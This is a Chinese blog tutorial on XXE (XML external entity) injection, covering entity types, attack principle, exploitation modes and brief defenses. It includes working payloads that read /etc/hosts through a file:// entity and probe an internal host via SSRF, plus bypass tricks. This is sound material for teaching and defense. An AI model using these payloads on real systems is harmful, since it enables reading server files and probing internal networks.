XXE解析

最新推荐文章于 2023-07-06 10:06:00 发布
最新推荐文章于 2023-07-06 10:06:00 发布
阅读量242 收藏
点赞数
文章标签: xml
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65041566/article/details/125004918
版权

XML:

可扩展标记语言,用于存储和传递数据,类似html;XMLJSON 是现今互联网中最常用的两种数据交换格式。

php解析XML函数:

simplexml_load_string() SimplexmlElement()

xml实体字符

或者 &#字符编码

DTD实体

内部实体:

<!ENTITY 实体名称 "实体的值"> 


外部实体:

<!ENTITY 实体名称 SYSTEM "URI"> 


参数实体:

<!ENTITY % 实体名称 "实体的值">


外部参数实体:

<!ENTITY % 实体名称 SYSTEM "URI">

XXE攻击

原理:

在解析xml时,没有禁止外部实体的加载,导致出现任意文件读取,命令执行,ssrf,dos攻击

触发点:

可以上传和解析xml和json数据的地方,没有对xml数据进行过滤,导致漏洞

利用方式:

  1. 文件读取

  2. 命令执行

  3. SSRF

  4. Dos攻击
     

文件读取

file://协议

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "file:///etc/hosts">
]>
<note>
	<heading>&file;</heading>
</note>

命令执行

expect:// 协议

为了使用 expect:// 封装器,必须安装 » PECL 上的 » Expect 扩展

SSRF

通过回显时间和内容判断端口和内网ip(burp抓包爆破ip和端口)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY xxe SYSTEM "http://10.211.55.5:80">
]>
<note>
	<info>&xxe;</info>
</note>

XXE blind盲打

适用外带通道读取数据

XXE绕过

  • 大小写绕过
  • 实体编码
  • 远程DTD
  • data协议编码

XXE漏洞查找

服务端接受数据类型为json或xml,可以尝试

Content-Type: application/xml

Content-Type: application/json

XXE的防御

  • 配置禁止外部实体的加载
  • 黑名单过滤用户提交的xml数据

.*晚风
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
XXE攻防——XML外部实体注入
aezwm4109的博客
05-24 2132
转自腾讯安全应急响应心 一、XML基础知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外...
XXE
砌墙的保安
08-24 281
文章目录XXE概念漏洞原理XMLDTDsimplexml_load_string函数介绍实体造成危害XXE无回显输出XXE与SSRF的区别XXE防御 XXE 概念 XXEXML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。 由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。 漏洞原理 既然XML可以从外部读取DTD文件,那我们就自然地想到了如果将路径换成另一个文件的路径, 那么服务器在解析这个XML
XXE总结
Ciyaso的博客
07-16 731
一、XXE 是什么 XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将注意力集于外部实体,而不要被 XML 其他的一些名字相似的东西扰乱了思维(盯好外部实体就行了),如果能注入 外部实体并且成功解析的话,这就会大大拓宽我们 XML 注入的攻击面(这可能就是为什么单独说 而没有
XXE知识总结,有这篇就够了!
热门推荐
南迪叶先森
07-14 2万+
公粽号:黒掌 一个专注于分享渗透测试、黑客圈热点、黑客工具技术区博主! XXE基础 XXE(XML External Entity Injection)全称为XML外部实体注入,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP的simplexml_load默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。而学习XXE要从认识XML开始。 XML基础 XML 指可扩展标记语言(EXtensible Markup Lang.
24-xxe漏洞学习
qq_56414082的博客
04-10 1465
实体是用于定义引用普通文本或特殊字符的快捷方式的变量。实体引用是对实体的引用。实体可在内部或外部进行声明。(1)内部实体声明ENTITY 实体名称 "实体的值">(2)外部实体声明ENTITY 实体名称 SYSTEM "URI">(3)参数实体声明ENTITY %实体名称 "实体的值">ENTITY %实体名称 SYSTEM "URI">通过在xml使用“&”符号对实体进行引用ENEMENT name ANY> //定义元素ANY表示接受任何元素。
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞的产生是因为 XML 解析器对外部实体的处理不当。攻击者可以构造恶意的 XML 文档,使得服务器将任意文件读取出来。这种攻击方式称为 XXE Injection。XXE 漏洞的测试原理可以分为以下几个步骤: 首先,攻击者...
5、XXE漏洞pdf资料
最新发布
10-15
XXEXML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的恶意XML输入时。XML(eXtensible Markup Language)是一种用于存储和传输数据的标记语言,它的主要特点是允许...
XXE - 防御策略-01
09-15
XXEXml External Entity)漏洞是一种常见的 XML 解析漏洞,攻击者可以通过构造恶意 XML 文档来读取敏感信息或执行系统命令。为了防御 XXE 漏洞,需要了解其成因和防御策略。 一、XXE 漏洞消亡原因 从 2018 年...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXEXML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
信息安全_xxe注入应用与拓展.pptx
08-14
XXE,全称为XML External Entity Injection,是针对XML解析器的一种安全漏洞,它利用XML文档的外部实体(External Entity)来获取系统敏感信息或执行恶意操作。XML实体允许开发者引用外部资源,如本地文件、网络...
XXE漏洞详解
weixin_53440207的博客
03-08 650
xxe漏洞详解
xxe
r_deku的博客
11-19 276
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、xxe漏洞简介二、xxe漏洞利用1.实验一:有回显读本地敏感文件(Normal XXE)2.实验二:无回显读取本地敏感文件(Blind OOB XXE) 前言 认识XXE之前必学认识XMLXML 指可扩展标记语言(Extensible Markup Language) XML是用于 标记电子文件 使其具有 结构性 的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包
XXE漏洞常见利用点总结
记录学习,一起进步
02-02 930
XXE漏洞常见利用点总结
Web安全 XXE漏洞的 测试和利用.(读取服务器的任何文件 和 收集服务器的内网信息.)
网络安全领域___专研者.
03-08 6437
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件读取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
PHP伪协议-文件包含漏洞常用的伪协议
wangyuxiang946的博客
08-19 1万+
在实战文件包含漏洞配合PHP的伪协议可以发挥重大的作用,比如读取文件源码,任意命令执行或者开启后门获取webshell等,常用的伪协议有 php://filter 读取文件源码 php://input 任意代码执行 data://text/plain 任意代码执行 zip:// 配合文件上传开启后门 下面拿ctf.show WEB模块的第3关举个栗子,这一关存在文件包含漏洞 php://filter php://filter 协议可以对打开的数据流进行筛选和过滤,常用于读取文件..
XXE漏洞的原理和利用
qq_51796436的博客
01-03 988
XXE全称为XML外部实体注入、 XML XML是可扩展标识语言的简写,和HTML的形式很像,后来用于应用程序之间数据传输的常用格式 HTML旨在显示信息,XML旨在传输信息 XML实体 根据实体来源可定义为内部实体和外部实体。XML定义了两种类型的ENTITY,一种在XML文档使用,另一种作为参数在DTD文件使用,定义好的ENTITY在文档通过“&实体名;”来使用 也就是说可以把实体当作xml的变量 DTD DTD使数据格式之间按照相同的标准来传输 DTD使一种XML约束模式语言,用来解
xxe漏洞利用
qq_50673174的博客
05-30 1529
XXEXML External Entity)是指xml外部实体攻击漏洞。XML外部实体攻击是针对解析XML输入的应用程序的一种攻击。当包含对外部实体的引用的XML输入被弱配置XML解析器处理时,就会发生这种攻击。这种攻击通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。
XXE超详细讲解(都是纯纯的干货)
weixin_63688999的博客
07-06 965
XXEXML External Entity injection)XML 外部实体注入漏洞,如果XML 文件在引用外部实体时候,可以沟通构造恶意内容,可以导致读取任意文件,命令执行和对内网的攻击,这就是XXE漏洞,这个漏洞需要大家还有一定的XML协议基础。XML是可扩展的标记语言(eXtensible Markup Language),设计用来进行数据的传输和存储, 结构是树形结构,有标签构成,这点很像HTML语言。语法引用的外部实体,而非内部实体,那么uri能写那些类型的外部实体呢?
XXE - 实体注入
净邪的博客
06-26 1278
什么是xxeXXE = XML External Entity 即外部实体,从安全角度理解成XML External Entity attack XML外部实体注入攻击 典型的攻击如下: 定义实体必须写在DTD部分 拆分开来简单点来说就是: XML: 官方介绍: XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。.
2015 Black Hat USA: XXE漏洞全解析与防御挑战
XXE是一种利用XML解析器的特性来执行恶意代码或读取敏感数据的安全漏洞,由于其广泛存在于应用程序和服务,尽管已有多年的研究和示例演示,但问题依然存在。 演讲首先回顾了XML标准关于外部实体的定义,强调...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

.*晚风

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值